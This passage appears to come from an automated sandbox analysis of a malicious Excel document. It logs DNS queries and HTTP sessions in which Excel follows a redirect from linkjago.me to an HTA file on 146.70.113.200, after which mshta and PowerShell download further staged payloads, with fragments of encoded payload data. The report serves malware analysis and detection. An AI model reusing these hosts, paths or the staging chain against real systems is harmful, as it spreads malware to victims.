                                                  Dec 2, 2024 07:25:36.220441103 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.220649004 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.220691919 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.221636057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222676039 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222758055 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.222858906 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.222870111 CET8049174146.70.113.200192.168.2.22
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Dec 2, 2024 07:24:32.442085981 CET | 192.168.2.22 | 8.8.8.8 | 0xc54c | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:37.543407917 CET | 192.168.2.22 | 8.8.8.8 | 0xc1c3 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:37.902837038 CET | 192.168.2.22 | 8.8.8.8 | 0xc1c3 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:38.259401083 CET | 192.168.2.22 | 8.8.8.8 | 0xc1c3 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.252788067 CET | 192.168.2.22 | 8.8.8.8 | 0xf911 | Standard query (0) | 1016.filemail.com | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.520430088 CET | 192.168.2.22 | 8.8.8.8 | 0xf733 | Standard query (0) | 1016.filemail.com | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:58.773317099 CET | 192.168.2.22 | 8.8.8.8 | 0x6222 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.132283926 CET | 192.168.2.22 | 8.8.8.8 | 0x6222 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.269537926 CET | 192.168.2.22 | 8.8.8.8 | 0x6222 | Standard query (0) | linkjago.me | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:14.974669933 CET | 192.168.2.22 | 8.8.8.8 | 0x6fa1 | Standard query (0) | 1016.filemail.com | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:15.352849960 CET | 192.168.2.22 | 8.8.8.8 | 0x46af | Standard query (0) | 1016.filemail.com | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Dec 2, 2024 07:24:32.798927069 CET | 8.8.8.8 | 192.168.2.22 | 0xc54c | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:32.798927069 CET | 8.8.8.8 | 192.168.2.22 | 0xc54c | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:37.902149916 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:37.902149916 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:38.259088039 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:38.259088039 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:38.393501043 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:38.393501043 CET | 8.8.8.8 | 192.168.2.22 | 0xc1c3 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.517004967 CET | 8.8.8.8 | 192.168.2.22 | 0xf911 | No error (0) | 1016.filemail.com | ip.1016.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.517004967 CET | 8.8.8.8 | 192.168.2.22 | 0xf911 | No error (0) | ip.1016.filemail.com | | 142.215.209.77 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.901190996 CET | 8.8.8.8 | 192.168.2.22 | 0xf733 | No error (0) | 1016.filemail.com | ip.1016.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:56.901190996 CET | 8.8.8.8 | 192.168.2.22 | 0xf733 | No error (0) | ip.1016.filemail.com | | 142.215.209.77 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.131899118 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.131899118 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.267518044 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.267518044 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.392216921 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:24:59.392216921 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | linkjago.me | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:15.347440004 CET | 8.8.8.8 | 192.168.2.22 | 0x6fa1 | No error (0) | 1016.filemail.com | ip.1016.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:15.347440004 CET | 8.8.8.8 | 192.168.2.22 | 0x6fa1 | No error (0) | ip.1016.filemail.com | | 142.215.209.77 | A (IP address) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:15.487755060 CET | 8.8.8.8 | 192.168.2.22 | 0x46af | No error (0) | 1016.filemail.com | ip.1016.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Dec 2, 2024 07:25:15.487755060 CET | 8.8.8.8 | 192.168.2.22 | 0x46af | No error (0) | ip.1016.filemail.com | | 142.215.209.77 | A (IP address) | IN (0x0001) | false
                                                  • linkjago.me
                                                  • 1016.filemail.com
                                                  • 146.70.113.200
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.22 | 49162 | 146.70.113.200 | 80 | 3392 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 2, 2024 07:24:35.584834099 CET | 359 | OUT | GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:24:37.155558109 CET | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:24:36 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 159457
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/hta


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.22 | 49164 | 146.70.113.200 | 80 | 3684 | C:\Windows\System32\mshta.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 2, 2024 07:24:40.512866020 CET | 436 | OUT | GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Range: bytes=8896-
                                                  Connection: Keep-Alive
                                                  Host: 146.70.113.200
                                                  If-Range: "26ee1-62840224d2d3d"
                                                  Dec 2, 2024 07:24:42.088551044 CET | 1236 | IN | HTTP/1.1 206 Partial Content
                                                  Date: Mon, 02 Dec 2024 06:24:41 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 150561
                                                  Content-Range: bytes 8896-159456/159457
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/hta
                                                  Dec 2, 2024 07:24:42.088718891 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                  Dec 2, 2024 07:24:42.088898897 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                  Dec 2, 2024 07:24:42.088943005 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                  Dec 2, 2024 07:24:42.088953972 CET1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                  Dec 2, 2024 07:24:42.208703995 CET1236INData Raw: 32 35 36 38 25 32 35 32 35 36 33 25 32 35 32 35 36 38 25 32 35 32 35 34 31 25 32 35 32 35 35 38 25 32 35 32 35 34 46 25 32 35 32 35 34 42 25 32 35 32 35 35 33 25 32 35 32 35 36 37 25 32 35 32 35 35 35 25 32 35 32 35 34 45 25 32 35 32 35 35 32 25
                                                  Data Ascii: 2568%252563%252568%252541%252558%25254F%25254B%252553%252567%252555%25254E%252552%252562%252550%252573%252571%252556%252575%252569%252579%252565%25256D%25254D%252544%252541%252564%252570%252567%252541%252575%25257A%252567%252552%252544%252549%


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  2  192.168.2.22  49165  146.70.113.200  80  3848  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Dec 2, 2024 07:24:47.731422901 CET  364  OUT  GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:24:49.307605982 CET  1236  IN  HTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:24:48 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:13:29 GMT
                                                  ETag: "25b10-62840183b3eb7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 154384
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: image/tiff


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  3  192.168.2.22  49171  146.70.113.200  80  1520  C:\Windows\System32\mshta.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Dec 2, 2024 07:25:01.657834053 CET  471  OUT  GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMT
                                                  Connection: Keep-Alive
                                                  Host: 146.70.113.200
                                                  If-None-Match: "26ee1-62840224d2d3d"
                                                  Dec 2, 2024 07:25:03.187020063 CET  275  IN  HTTP/1.1 304 Not Modified
                                                  Date: Mon, 02 Dec 2024 06:25:02 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  4  192.168.2.22  49173  146.70.113.200  80  3108  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Dec 2, 2024 07:25:18.217883110 CET  79  OUT  GET /231/ZAHHRZA.txt HTTP/1.1
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:25:19.749361038 CET  1236  IN  HTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:25:19 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:12:20 GMT
                                                  ETag: "5daac-628401412802e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 383660
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain


                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                  5  192.168.2.22  49174  146.70.113.200  80  3512  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp  Bytes transferred  Direction  Data
                                                  Dec 2, 2024 07:25:33.524817944 CET  79  OUT  GET /231/ZAHHRZA.txt HTTP/1.1
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:25:35.107614994 CET  1236  IN  HTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:25:34 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:12:20 GMT
                                                  ETag: "5daac-628401412802e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 383660
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain
                                                  Dec 2, 2024 07:25:35.108187914 CET1236INData Raw: 77 62 64 57 34 63 42 63 69 33 37 71 32 6c 4d 36 65 51 6d 42 65 38 74 32 6f 49 64 69 50 71 55 4f 78 67 76 69 30 4a 32 46 36 6b 31 70 48 46 39 2b 57 6e 62 65 57 72 7a 31 39 66 56 6c 48 62 53 44 4a 4e 6d 71 65 56 64 4c 36 6d 72 42 75 44 56 78 56 4b
                                                  Data Ascii: wbdW4cBci37q2lM6eQmBe8t2oIdiPqUOxgvi0J2F6k1pHF9+WnbeWrz19fVlHbSDJNmqeVdL6mrBuDVxVKMrAZFmW10Stcxuq3nUNbghWBvdWd+MuDwsbxcopwTS8hZvC5lU27CErb5MIHGlFeQMAvMosJn/hudTa5huwssm1eMIvv61JTfil6xotFWtlUrSuRLyIp6pBrFB/M1QrmWkKWpTm5OOUc2E4G8rg5hzDT30LIT86Mh
                                                  Dec 2, 2024 07:25:35.108197927 CET1236INData Raw: 2b 4a 64 4e 39 4c 6c 71 51 4f 59 49 48 74 55 75 78 7a 2b 4c 73 64 6e 42 58 75 53 6f 4a 73 2f 36 75 44 69 65 45 42 50 4d 51 6f 66 66 50 54 37 41 6d 30 55 51 78 6e 4c 2b 43 6e 4f 76 75 64 49 6e 35 4b 52 78 4a 52 6b 77 67 52 39 79 48 71 41 61 46 58
                                                  Data Ascii: +JdN9LlqQOYIHtUuxz+LsdnBXuSoJs/6uDieEBPMQoffPT7Am0UQxnL+CnOvudIn5KRxJRkwgR9yHqAaFXNW9I7oCmfyhMdM0s7R9UdKA8SK1T9Du3M8+xSpd74TO4gg1hrgTx/R7U/ykUSyUSEMs/etgNoLw4IovWi7Yc46IY+PjjbgWT4fjuBLWr/n8hO63cq4IoBdKfatRrItlKqUYcfkyy8n1o8IcnIz5JlYFujoNqIA+CI
                                                  Dec 2, 2024 07:25:35.228010893 CET1236INData Raw: 76 6f 6e 68 78 56 64 59 62 39 59 2f 71 47 63 67 51 6b 66 66 74 65 77 77 63 57 75 74 4d 75 76 51 67 67 4c 2b 57 6a 6f 59 39 47 75 42 56 44 67 64 6c 51 73 50 42 51 33 31 44 33 71 64 2b 74 4a 70 70 6e 2f 51 76 45 4d 58 78 6f 55 69 4d 61 4a 4a 78 45
                                                  Data Ascii: vonhxVdYb9Y/qGcgQkfftewwcWutMuvQggL+WjoY9GuBVDgdlQsPBQ31D3qd+tJppn/QvEMXxoUiMaJJxEA67C0tg7bKZWY4Uw9vOE9aGU1TsGnLpg9VSD7+RDCPY6EGsGl9bndIWKMkJxj/xfoeZxX4wj3RBGe/NV2HMAjtzLFwv6GboMfRZAVEpkif/4xnnjVcmYBqrACNG30OftaLZvmJRlzgjpEWcdSoU3XEzLnCye3vTO3


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.22 | 49161 | 188.114.96.6 | 443 | 3392 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:24:34 UTC | 402 | OUT | GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:35 UTC | 1200 | IN | HTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:35 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFbck8h0Ykcp7n5miexzSeGzdY0tE%2BfZ4zdOt5erAsZFO3oMTqFYac3eVk57lhSTKZ0Fr2ZUJzwBau1zfvggUKZJqPOHEvIh%2FfNX78XJT57eR%2BhH5GFIk8XULibgDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93c17c9e0185d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:35 UTC | 216 | IN | Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=984&delivery_rate=1747456&cwnd=236&unsent_bytes=0&cid=0dfacb8d0bec6d1b&ts=1218&x=0"
                                                  2024-12-02 06:24:35 UTC | 82 | IN | Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.22 | 49163 | 188.114.97.6 | 443 | 3684 | C:\Windows\System32\mshta.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:24:39 UTC | 426 | OUT | GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:40 UTC | 1198 | IN | HTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:40 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzPKLtu9FVXOSSlxfy0qXFXAnpYZLUQPOQfZHcBFnNxsfs3sL3yxl9y35b3Quj8q6cA5kFMA3hd4wKqrc%2B6GcnbSfWXOVd7v%2FmWom8AjWBAkl4hpXIpHiA9mEoOn3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93c398d4917a9-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:40 UTC | 216 | IN | Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1496&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2810&recv_bytes=1008&delivery_rate=1951871&cwnd=238&unsent_bytes=0&cid=45366711959575f4&ts=734&x=0"
                                                  2024-12-02 06:24:40 UTC | 82 | IN | Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.22 | 49166 | 188.114.96.6 | 443 | 3392 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:24:57 UTC | 402 | OUT | GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:57 UTC | 1208 | IN | HTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:57 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqdXdP54fEp%2Bk7hqgmVdneCF%2BD%2BGZiC5j3gdkY58GoGGy3bnxIFbdrW5PpnK%2BQdUzRNzem1VveSuYrlxNgrnj%2BpeA5BQ6af2rrgshIvNB7m%2Bprv9EnxdP3hXj%2B0hCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93ca73b5a439a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:57 UTC | 215 | IN | Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1708&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=984&delivery_rate=1670480&cwnd=233&unsent_bytes=0&cid=c2baff4498ee8961&ts=756&x=0"
                                                  2024-12-02 06:24:57 UTC | 82 | IN | Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
